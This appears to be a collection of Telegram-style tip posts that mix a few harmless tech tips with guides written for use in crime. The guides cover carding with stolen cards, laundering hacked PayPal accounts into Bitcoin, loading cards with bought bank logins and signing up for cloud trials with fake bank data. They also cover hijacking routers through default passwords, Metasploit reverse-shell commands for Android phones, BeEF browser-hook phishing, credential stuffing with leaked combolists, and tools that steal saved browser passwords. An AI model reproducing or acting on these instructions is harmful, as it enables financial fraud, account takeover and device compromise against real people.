⚫️ Your work requires it. Your workplace may have encryption protocols, or it may be subject to regulations that require encryption. In these cases, encryption is a must.


Enjoy! Follow us for more...

Types Of Encryption


There are several types of encryption, each developed with different needs and security needs in mind. Here are the most common examples of encryption.


Data Encryption Standard (DES)

━━━━━━━━━━━━━

Data Encryption Standard is considered a low-level encryption standard. The U.S. government established the standard in 1977. Due to advances in technology and decreases in the cost of hardware, DES is essentially obsolete for protecting sensitive data.


Triple DES

━━━━━━━━━━━━━

Triple DES runs DES encryption three times. Here’s how it works: It encrypts, decrypts, and encrypts data — thus, “triple.” It strengthens the original DES standard, which became regarded as too weak a type of encryption for sensitive data.


RSA

━━━━━━━━━━━━━

RSA takes its name from the familial initials of three computer scientists. It uses a strong and popular algorithm for encryption. RSA is popular due to its key length and therefore widely used for secure data transmission.


Advanced Encryption Standard (AES)

━━━━━━━━━━━━━

Advanced Encryption Standard is the U.S. government standard as of 2002. AES is used worldwide.


TwoFish

━━━━━━━━━━━━━

Twofish is considered one of the fastest encryption algorithms and is free for anyone to use. It’s used in hardware and software.


Enjoy, follow us for more

BEST WAY TO LOAD USA CREDIT CARD

  



1:When u are givn a credit card wit online access , you 1st go 2 google nd type “name + credit card login” so if it is discover it is “discover credit card login” , chase wil b “chase credit card login”


2:Login into the credit card


3:AVAILABLE CREDIT = amount of money on the credit card, 

 CURRENT BALANCE = limit of amount you need to load ,

TOTAL CREDIT LINE= Available credit + current balance


4:Click on MAKE A PAYMENT


5:U can either choose the CURRENT BALANCE AMOUNT or state your own amount, NEVER write an amount HIGHER than Current Balance but you can write an amount LESS than that to play safe


6:Amount written ..(As I said, should never be more than Current balance amount)❌


7:Your will be asked for a PAYMENT SOURCE (where the money should be taken from ) Same as the Bank login u buy from spammer, online 

8:If u want to add a new account info, just click on UPDATE BANK ACCT and input the ACCOUNT NUMBER and ROUTINE NUMBER of the bank login u bought


9:Now click on SELECT A BANK as your bank login info has now being added to cc


10:I added a Bank of America bank login so I choose it from the drop-down 


11:Click on CONTINUE


12:Last page , you can check and make sure everything is correct , if not you can make the final changes


13:Done 


14:By next day , the amount you loaded will reflect 💯, you will ask owner of credit card to go cashout money and then enjoy


Follow us for more...




Simple tutorial for exchaging hacked paypals to Bitcoins.


Requirements: -VIP72 VPN or other good VPN 

              -Some hacked paypals 

              -VBA(Virtual Bank Account) with FAKE infos 

              -1 unveridied and 1 verified fake paypal 

              -1-2 hour


PART 1: PayPal cahsout 


1.Clear cookies, use VPN and create 1 fake ppl with VBA and VERIFY it! 

2.Clear cookies, chanege to random VPN and create 1 unverified fake paypal.(Wait 30min) 

3.Clear cookies, change VPN to hacked paypal location and send 50$ as GIFT to fake paypal. 

4.Send 50$ till you limit the hacked paypal. 

5.Change back VPN to unverified fake paypal and DONATE immediatelly to verified fake paypal. 

6.Get new hacked paypal and repeat step 2-5. Proceed to step 7 after you reach MAX 1000$! 

7.Clear cookies, change VPN to verified fake paypal and withdraw to VBA. 

8.Wait 3-4 days and cross fingers. You should get your money!


PART 2: VBA usage Part 1 is anonymus since you didn't used any personal info and you did hide your IP! But if they really wants to find you they can detect what you have done with your VBA.

-If you ordered to your real house, you are fucked.

-If you used Wester Union for yourself, you are fucked.

-If you done anything that can be associated with you, you are really fucked. So how to be competelly anonymus?!

Buy


PAYPAL --------------------------


Buy Bitcoins! All exchangers accept WU, why you should risk yourself?

1.Clear cookies, use verfied fake paypal VPN!

2.Register to WU with the fake VBA details.

3.Send money to exchanger and get BTC. After you got your Bitcoins you are GOLD. They will never find you. Its easy and anonymus!


Enjoy! Follow us for more...

How To Hide Calls and SMS Logs of Specific People in Android


 💠 Using Shady Contacts


          ⚜ It’s an Android app that’s meant to hide SMS and call logs away from the stock apps. What’s interesting is that Shady Contact allows users to select contacts to hide the SMS and call records. Here’s how to use Shady contacts on Android.


🔹Step 1: First of all, you need to download & install Shady Contacts.


🔹Step 2: Once installed, launch the app and tap on the ‘Continue’ button.


🔹Step 3: Now on the next screen, you just need to set up a pattern lock.


🔹Step 4: You need to confirm the unlock pattern again.


🔹Step 5: Now you will see the main interface of the app. Simply, tap on the ‘Contact’ icon to add the contacts to hide.


🔹Step 6: Select the contacts whose details you want to hide from your call records.


    ✅ That’s it! You are done. Now your privacy is secure, and all the selected contacts and messages will be hidden from the other users.


Enjoy! Follow us for more...

Google Cloud Iban Explained

 🔰🔰


Link: Click Here

Ip: Germany, Netherlands, France  or any other IBAN country. 

Use old GMail. atleast 2-3 years old google account


Instructions:

1. Download Opera Web Browser, Clear Cookies Cache and Go to Opera Settings, find VPN and turn it ON.

2. Connect to Europe Location, Sign in to your Google 2-3 years old account

3. go to cloud.google.com & click get 12 months free

4. go to ip2location.com & see what country & ip Opera has set you up Most of times it will set you IP: Netherlands.

5. Go to fake-it.ws/nl/ Return to cloud.google.com tab, and change country to Netherlands, and tick both google terms and hit continue,

6. Let it be on Business Account and grab data from https://fake-it.ws/nl/ and fill in Google Cloud 

7. On Payment below, click small option and you will see Add a BANK Account, click it to add Bank Account grab data from fake-it.ws/nl/ and fill in 

8. Click verify, then wait 10-15 seconds Finally click START Free TRIAL on Google Cloud

9. Click Compute Engine, Wait for few minutes or refresh page. Once you see Create button available click on it

10. Create your VM Instances. Note 30GB RAM is the limit do not surpass it.   


 Enjoy! Follow us for more...

How to Check Used & Empty RAM Slots on Windows 10


     ⚜ lt’s worth noting that there are plenty of third-party tools available to check the RAM slots, but most of those software contains malware that can damage your system files. So, let’s check the steps to quickly find out if your PC has any available memory slots left.


🔹Step 1: First of all, open the Start Menu and search for Task Manager.


🔹Step 2: Open Task Manager from the List. You can also open Task Manager By Pressing CTRL + ALT + Delete.


🔹Step 3: Now on the Task Manager, you need to move to the ‘Performance’ tab.


🔹Step 4: Now under the Performance tab, select ‘Memory’


🔹Step 5: Now on the right-hand side panel, check the ‘Slots Used’. On my computer, its showing 1/2. That means I can add an extra memory stick.


✅ That’s it, you are done! This is how you can quickly determine memory slots available on the Motherboard on Windows 10


Enjoy! Follow us for more...

Best Free Graphic Designer Tools for Windows [Top 3]

  🔰 

➖➖➖➖➖➖➖➖➖➖

1⃣ Adobe Illustrator CS2


           🔹 Well, Adobe Illustrator CS2 is free available for users and it comes from the Adobe itself. Despite being a free tool, Adobe Illustrator CS2 is used by professionals. The tool has always been known for its advanced features and unique graphic designing options. It could help you design some professional graphics in no-time.


2⃣ Canva


         🔹 Well, if you don’t have much storage left on your computer and looking for a web-based designing tool, then you need to give Canva a try. This is an online tool that provides you over 50 free preset templates to create your own graphic designs. It offers plenty of features like 3D Shapes, 3D effects, filters, etc.


3⃣ Sumo Paint


         🔹 It is another powerful graphic design tool that operates inside your browser. This tool allows you to use advanced tools inside your browser to create unique graphic designs instantly. The only thing why this amazing tool is on our list is that you could easily transform any ordinary image into tremendous looking graphics in just a few clicks.


Enjoy! Follow us for more...

How to Update your Graphics Driver for Maximum Gaming Performance

 ✳️ 


✅ So, in this article, we have decided to share a few best methods to update your graphic cards for the maximum gaming experience. So, let’s check out how to update your graphics driver for maximum gaming performance.


⭕️ Step 1: The very first step is to identify the graphics card that is inside the device that you are using. Once you would find the information on the graphics card that is on your system then you should be able to make the changes to the connected drivers. To find out which of the graphics driver is on your system simply search for the System Information, enter the settings that appear in the search results.


⭕️ Step 2: You will reach to the System information panel where you will have to go to the Display tab inside the panel. Go to the panel and from there look for the Adapter Type options. There will be the exact identification of the Graphics card details through there.


⭕️ Step 3: On getting the exact information about the graphics processor and while you have got the manufacturer for the Graphics card then you could proceed to download the corresponding drivers for the different graphics cards through the links given below-


▪️Download NVIDIA Graphics Drivers


▪️Download AMD Graphics Drivers


▪️Download Intel Graphics Drivers


⭕️ Step 4: Make sure when you reach the above links you will still require to chose the exact model and the information of the graphics card so as to download the latest released update from manufacturers and the developers. Not every one of the graphics cards would be having the update for the drivers but you could check for it through the links.


✅ That’s all about updating the graphics drivers, hope that you would be able to go ahead with the option sets so as to make the changes to the drivers and thereafter get the ultimate gaming performance.


Enjoy! Follow us for more...

General Method of Carding

This is a general carding method is easy and straightforward to do on any online shopping site but may differ depending on a site.

All you just have to buy is a valid cc and you can start carding but make sure there is balance in cc otherwise order will be failed (You can buy live cc from your trusted vendor if you don’t have, I can guide).

-------------------------STEPS---------------------------

1. Create an email account with a CC matching name. 

2. Now Run Remote Desktop Connection and connect with your RDP Host. But if you are not using RDP, then follow the below steps.

3. Run MAC address changer, change all MAC addresses.

4. Run CC cleaner. Analyze and clean. 

5. Set socks in Mozilla Firefox. (I’ll explain that). 

6. Now Restart Firefox and go to Whoer.net and check if your IP is blacklisted or not and is it the same as CC holder address. 

6. Now open any shopping site. I will recommend a shopping site in your country. Why? Because you don’t need to wait a lot to get your package.

7. Now Register with credit cardholder information, name, country, city, address, and email you made just for this order. 

8. Choose your item & add it to the cart. (Never choose a large amount of items first). 

9. In shipping address enter your address or your drop address, where you want to deliver the product. 

10. Go to the payment page, choose Credit Card as a payment method 

11. Enter your CC details. Like CC Number, CC holder name, CVV/CVV, Exp. Date. (NOTE: Don’t copy & paste info. Type it one by one. Cause most sites have copy paste detector script).

12. In Billing address enter CC holder address. Now proceed to payment. 

--------I am sure if you do everything right, then the order will be successfully placed. Wait for orders to arrive at your shipping address. When they arrive the courier boy will call you and in case, they ask for any ID card. you can make a fake ID card. --------

    

  How to use socks in Mozilla Firefox: 

1. Open your Firefox 

2. Go to Options 

3. Click on Advanced setting. 

4. Select Network and setup port and proxy.

Now the screen will pop up with various options like 

1. No proxy; 

2.Auto Detect; 

3.Use system proxy; 

4. Manual proxy configuration. 

You mark 4. Manual proxy configuration. 

Now type in socks host IP you have, For example Socks Host: 161.0.8.34 Port: 1080.



Enjoy! Follow us for more...

How to Hack the Home Routers and gain the Admin Rights…

Requirements:

Port Scanner (zenmap,superscan or unicornscan.I use Zenmap)

Web Browser (Chrome,Firfox or Safari)

Internet Connection(Any kind of Internet connection)


First of all I want to tell you why I use Zenmap because Nmap is the best friend of hackers and Zenmap is the graphical user interface of nmap.


Instruction on How to Hack the Home Routers and gain the Admin Rights…


1. We should select an IP range. I have selected IP range that includes my public IP address.


XXX.XXX.30.0-XXX.XXX.30.255


2. Now let’s scan for home routers.


When you finished your scan, You can find IP addresses which has open ports such as http port(80), ftp port(21) and telnet port(23).


I have found many IP addesses with port 80 is opened.


So I stopped my scan.


3. Now you can access these addesses using your web browser because http port is opened and we need to find whether the web page is router log in page.


4. If you see the alert error messages, it says TD-8817. So we can Google for it or you can visit routerpassword.com to know the default router username and password


5. Now let’s try to access these IP addresses using default logins we just got on step 4.

Default username and passwords are not same for every routers.

With username : admin and password : admin, we can log in to the router administration page


Enjoy! Follow us for more...


Disable ads on your Android smartphone

 🔰🔰


The method described below works on Android, starting from version 9.0, however, if your device has an Android version lower than the required one, you can alternatively use the AdGuard ad blocker 


You can find out the version of the android by going to the system settings by opening the item "About device" or "About phone". The Android version field will indicate the currently installed version.


Now let's move on directly to disabling ads. Note that on different devices, the item names may differ:


Let's get started:


1. Open settings> wireless networks (Network and Internet) 


2. We see the item Private DNS. (You may have it in a separate menu "Other settings") 


3. In the field that opens, enter "dns.AdGuard.com"



That's it, close the settings and enjoy the absence of ads.



You can also disable advertising through a router - then all devices on the network will work without advertising. 


This method works on all devices connected to the router PC, laptop, phone, etc.



We will block it using DNS AdGuard



1. We enter the settings of the router through the browser, drive in the line 192.168.0.1 , or 192.168.1.1 the password and login, if you have not changed admin


2. We find the DNS settings, on each router in different ways.


3. We drive in these addresses: 


176.103.130.130


176.103.130.131


That's it, there are no more ads.



Enjoy! Follow us for more...

Using nbtstat to Find a Computer Name

 

🌀Have you ever wanted to know what computer belongs to what IP address?


🔹This information can come in very handy when trying to troubleshoot network issues or see if there are devices on your network that don't belong there.


🔹Just knowing the IP address of a device on your network may not be enough information to figure out what you need to know.


🔹Sure you can ping an IP address but that only tells you if there is connectivity.


🔹Sometimes you can use the -a switch with the ping command and see if you get lucky and it resolves the IP address to a name.


🔹Another command line utility you can use to help you in your quest for finding the computer name associated with an IP address is the DOS command nbtstat to find NetBIOS computer names if you use NetBIOS on your network.


🔹Just open a command prompt by going to Start, Run then type in cmd and click OK. Here are the available switches you can use with the nbtstat command.


🔹The one you want to use to find the host name associated with the IP address is nbtstat –a followed by the IP address. In the following example you can see 192.168.1.2 is the IP address, Jim is the computer name and WORKGROUP is the workgroup name.


Enjoy! Follow us for more...

How to know if BIN Has OTP or Not


Pick your bins carefully cause you can't check 100s a time. ⚠️


1. Create a account at play-asia.com with fake email and credentials


2. check for 5-15 mins the website and place an item in your cart


3. Place order, create fake info and Fill in the requiredments


4. Choose pay with credit card, you will be redirected to the page where you insert the CC info.


5. Go with your bin you want to check to namso.ccgen.co and generate some valid CCs


6. Insert the generated CC to the payment page of play-asia.com

CVV, Expry, name does really not matter ❗️


the only thing that needs to be valid is the CC with your bin ‼️


If you get a prompt with verify blah blah blah.. then your bin is VBV/MCSC\ 🔐


if you got redirected, and you get an error message with the follow output:

There was a problem with your payment: Payment status - Declined


CONGRATS!! your bin is non-vbv/non-mcsc!! 


Enjoy! Follow us for more...

How to steal password saved in browsers installed to windows

 🔰🔰


🔷 TOOLS REQUIRED 👇


1⃣ IE passview - This a small program that help us view passwords saved in Internet explorer.download here


2⃣ Password fox -This a program that allow us to view passwords saved in  mozilla firefox download here


3⃣ Mail passview - This is a small password recovery tool that reveals passwords and other account details of outlook,epress and window mail download here


4⃣ MessenPass- This password recovery tool reveals pasword for instant messenger applications download here


5⃣ PSPV - Utility program that also reveals passwords in our computer download here


Enjoy! Follow us for more...

HOW TO USE JUMIA LOGS

 

▪️ After Making Purchases for the jumia logs


▪️ Log in to the Jumia website (you don’t need any vpn) 


▪️ Buy any of the available products you want and add to cart.


▪️ Click on confirm order and change the shipping address of the products to a location like market or bus garage close to you.


▪️ After that click on "PAY FROM JUMIAPAY BALANCE" and proceed to checkout.


▪️ Your order will be confirmed and your goods will be successfully shipped to the address you put.


▪️ You’re good to go, Your orders will be delivered to you successfully.


⚠️ In the carting process, you will be asked to provide, Name, phone number, and address. Make sure those details are fake.. 

- Name: should be different from your real name.

- Phone Number: must be a new registered sim without registering with much of your real information. 

- Address: Must be a public place like Garage or Market.


▪️ They will send a code to your phone on the day of delivery, you will provide the code to the delivery man as your Identity to make sure they are delivering to the right person, which is You.


▪️ Get your goods and sell them or keep them for your personal use..

It’s your choice.


Enjoy! Follow us for more...

Hack Android Phone on LAN

Step By Step to Hack Android Phone on LAN:



#1. Go to the Termux Application.


#2. Got to the Metasploit Directory using Cd command


#3. Type msfconsole and wait for a few minutes to get a Metasploit screen.





#4.  use exploit/multi/handler


I am running exploit for the multi/handler and execute our generated executable on the victim. The multi/handler handles the exploit for us and presents us with our shell.


#5. Set the reverse TCP android payload:



msf exploit(handler) > set payload android/meterpreter/reverse_tcp



#6. Set the local and remote hosts:



msf exploit(handler) > set lhost 192.168.0.20 lhost => 192.168.0.20



192.168.0.20 address is your phone IP address. Make sure when you are creating a payload type the LHOST= < your IP address >


You can check my post of creating a payload in Metasploit which is the first part of this post. Without reading that post it will be difficult for you to understand this post.



#7. Set the local port:



msf exploit(handler) > set lport 4444


lport => 4444



#8. Exploit


Now that you have a session open. Make sure the user clicks on the application/payload that you have made it for them and then you can begin with meterpreter.

(Soon we will make Vid & post it👍🏻)


Enjoy! Follow us for more...

Generate metasploit Payloads in Easiest way using TM venom specially for Termux users.


[!] Tmvenom :- Tmvenom is a python based tool specially designed for Termux users.This payload generates some basic payloads using metasploit-framework so You must install metasploit framework on your Termux.This tool works both rooted and non rooted devices.This is very helpfull for beginners.


♉️ Requirments:-


1. Termux APp

2. metasploit-framework


✳️ Installation :


$ apt update


$ apt upgrade


$ apt install git


$ apt install python2


$ git clone https://github.com/TechnicalMujeeb/tmvenom


$ cd tmvenom


$ chmod +x *


$ sh install.sh


✳️ Usage :


$ python2 tmvenom.py

                     &

$ python2 tmvenom2.py


Now select payload options and you can easily generates payloads.


Enjoy! Follow us for more...

[CRACKING TUTORIAL] HOW TO CRACK HQ ACCOUNTS IN 2020! BY TAPIETRICKS


[ʙᴇɢɪɴɴᴇʀ ғʀɪᴇɴᴅʟʏ ]

1. Download Openbullet Anomaly: https://github.com/PurityWasHere/Anomaly-Mod-Hosting This is the program that we will be using to crack accounts, and the anomaly version is simply a plugin that comes with a lot of tools that we can use.


2. So to crack accounts, you will need 3 things. A config, combolist and some proxies. I will explain to you how to get all 3


3. So firstly, the config. When starting out, you won't know how to make your own config, so I suggest finding configs on the config section of the forum and downloading them. You can always take a look at how people have built their configs and try to emulate them.


4. Now for a combolist, since the combolist section was removed from c.to and n.to, I recommend using databases. You can always find them by google searching *insert database* leak download.


5. Finally, you'll need proxies for most websites, as they usually ban you after a certain amount of attempts. Brought to you by hackfreaks official.There's not really a good solution here, but I do have a private method for getting proxies in my ebook coming out soon. 


For now I recommend getting proxies in proxies section or using https://proxyscrape.com/free-proxy-list They're not the best of quality but they will do for most configs.


6. Now that you have all 3 parts of the puzzle. Put each of them in Openbullet and press start, and wait for the hits to come in.


Enjoy! Follow us for more...

HACK ANY DEVICE BY BEEF TOOL


Hy guys welcome to this page i got this idea from news china hackers attack our teachnolgy company by using social enginering and link exploit example they send mail to our indian company like- hey sir we need help can you go to this website and help us and then boom the virus exicute in the background . so beff tool help us to make exploit link it is preinstalled iin kali linux and this is my one of my favourite article i will tell in network attack if you want to do out of network then forward your port in this tutorial i will teach you in the network bco i don,t have router and open vpn gui . let, start


▪️1 - Open terminal and type location of your bee file like- cd/desktop/beef/-xss and after you selcted loaction hit enter

▪️2-Type-  ./beef . this command is used to run beef

▪️3  After running it will show you your local system ip adders named UI URL: copy that adders rom it we can see that our victim has browsed our virus web or not so note it done

▪️5- Paste that ip in your broweser after that beed website will open enter this pass- beef and pass is also beef

▪️6- After that it will show all your panels online and pannel browser

▪️7- Minimise that terminal and open new terminal

▪️8- We have to create a page first follow my steps go to this directery - cd/var/www/html. enter it now our temminal is in this location and type ls and enter

▪️9- There are two files in this folder we have to remove let me tell you ho to remove type - rm ((and file name)) and enter and delete both files

▪️10- Now we have to create a html file so type this command- nano index.html and press enter

▪️11- Now we are in the html editor now give any website code or make own if you know programing just chane tittle as your name and change ip that beef give hook url just it will in java .jv paste in script srs

▪️12- Now save it by pressing cotrol+x and type y and it will be saved

▪️13- Now we have to start the apache server so type this command- service apache2 start . and enter our apache server is started 

▪️14- Done now we just have to send hook url to to victim 

▪️15- Now open url ip that i say yout o save open it in web it will ask pass enter beef and beef now it will show online victims just go in it and do whatever you want 


THATS ALL I HOPE YOU LIKE

Enjoy! Follow us for more...

UPDATED HACK ANDROID/WEB/SNIFF/WIFI /MUCH MORE.


Information Gathering

Password Attacks

Wireless Testing

Exploitation Tools

Sniffing & Spoofing

Web Hacking

Private Web Hacking

Post Exploitation

Install The HACKERPRO

Information Gathering:

Nmap

Setoolkit

Port Scanning

Host To IP

wordpress user

CMS scanner

XSStrike

Dork - Google Dorks Passive Vulnerability Auditor

Scan A server's Users

Crips

Password Attacks:

Cupp

Ncrack

Wireless Testing:

reaver

pixiewps

Fluxion

Exploitation Tools:

ATSCAN

sqlmap

Shellnoob

commix

FTP Auto Bypass

jboss-autopwn

Sniffing & Spoofing:

Setoolkit

SSLtrip

pyPISHER

SMTP Mailer

Web Hacking:

Drupal Hacking

Inurlbr

Wordpress & Joomla Scanner

Gravity Form Scanner

File Upload Checker

Wordpress Exploit Scanner

Wordpress Plugins Scanner

Shell and Directory Finder

Joomla! 1.5 - 3.4.5 remote code execution

Vbulletin 5.X remote code execution

BruteX - Automatically brute force all services running on a target

Arachni - Web Application Security Scanner Framework

Private Web Hacking:

Get all websites

Get joomla websites

Get wordpress websites

Control Panel Finder

Zip Files Finder

Upload File Finder

Get server users

SQli Scanner

Ports Scan (range of ports)

ports Scan (common ports)

Get server Info

Bypass Cloudflare

Post Exploitation:

Shell Checker

POET

Weeman


🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :


A) Installation in Linux :


1) Open Terminal and Type : git clone https://github.com/jaykali/hackerpro.git


2) After Downloading The File Type : sudo cd hackerpro && sudo python2 hackerpro.py



B) Installation in Android :

1st Download Termux


1) Then Open Termux and Type : apt update && apt upgrade && apt install git && apt install python2


2) After That Open Termux and Type : git clone https://github.com/jaykali/hackerpro.git


3) Then Type : cd hackerpro && python2 hackerpro.py


After install choose options with numbers,simple to use.


Enjoy! Follow us for more...

BYPASS MEGA LIMIT WITH A SIMPLE SCRIPT


1.create a new mega account with tempmail, verify it and login on your new MEGA account  


2. To run the script you first need to add the Google Extension Tampermonkey to your browser


3.Click on the Tampermonkey Icon from your browser and choose the “Create a New Script”-


This will open up the Script Editor. Delete all of the content that is already prepopulated


4.Now copy the script from the pastebin link below


Mega.nz Script: 

https://pastebin.com/4AXkE1yE


And paste it into the Tampermonkey userscript section. Then click file & save


Now just make sure that it’s enabled and you’re all set


Enjoy! Follow us for more...



As long as there’s a remaining space in your cloud, you can import any link bypassing the 50GB limit.

this script work only from imported links. 



SHUT DOWN YOUR ANDROID DEVICE BY MAKING CALL FROM ANOTHER PHONE


Step 1. First of all, download and install the Automateit app. This app needs root access. So, make sure to grant the root permission.


⭕️Step 2. Next, select ‘My Rules’ and tap on the (+) icon.


⭕️Step 3. In the next screen tap on the ‘Call State Trigger’


⭕️Step 4. Now, choose the option ‘Incoming Call’


⭕️Step 5. In the next step, select the contact. You can choose from saved contacts or can create a new one.


⭕️Step 6. Now tap on ‘Next’ and on the next screen, select ‘Shutdown Device Action’


⭕️Step 7.Now you need to provide the name for the rule and save the rule.


Now you just need to make a call from the contact you specified and your Android device will be shut down.


Enjoy! Follow us for more...

Database breach , Check About breach here


🌀 Mostly all below are paid sites which require subscription to check the password for email BUT you can simply enter email & check whether that email's password has been leaked or not , if yes than in which DB it has been leaked


https://snusbase.com 

https://leakcheck.net 

https://leaked.site 

https://leakcorp.com/login 

https://haveibeensold.app 

https://leak.sx

https://vigilante.pw 

https://scatteredsecrets.com 

https://nuclearleaks.com 

https://www.dehashed.com 

https://hashes.org 

https://ploit.net 

https://ghostproject.fr 

https://private-base.info 

https://www.babatools.net 

https://leakth.is 

https://leak-lookup.com 

https://hacked-emails.com 

https://www.hotsheet.com 

http://www.leakeddata.cc 

https://intelx.io 

https://leakpeek.com


⚠️➖➖ @Retr0sapiens ➖➖⚠️

               Enjoy ❤️👍🏻

Tutorial for IPVanish Proxies

If you are new to cracking or even quite well versed with the working, you must have come across the talk ofIPVanish Proxies. They are quite good public proxies that can be utilised for several tasks. Please follow the steps below to generate the proxies for your use:


Prerequisites: 

1. IPVanish Premium Account                

2. List of Proxy Locations                        

3. A checker that can utilise

Username:Password Proxies


Method:

1. Log into the IPVanish Premium Account and head over to the Socks5 Proxy Tab.

2. Locate the Username and Password. Copy them and save in the format Username:Password somewhere

3. Download the text file : 

https://www.upload.ee/files/12641826/IPVanish.txt.html

4. Select the username:password in the text file and click on Replace option as shown in the screenshot

5. Paste the earlier copied Username:Password into the Replace With box and click on Replace All. 

6. Save the file and you have working Fairly HQ Socks5 Proxies ready to use for your task


Enjoy ! Follow us for more...

BreakingApp – WhatsApp Crash & Data Loss Bug_137

 

Download now

Enjoy! Follow us for more...

How to use a solderless breadboard.mp4

  Download now  Enjoy! Follow us for more...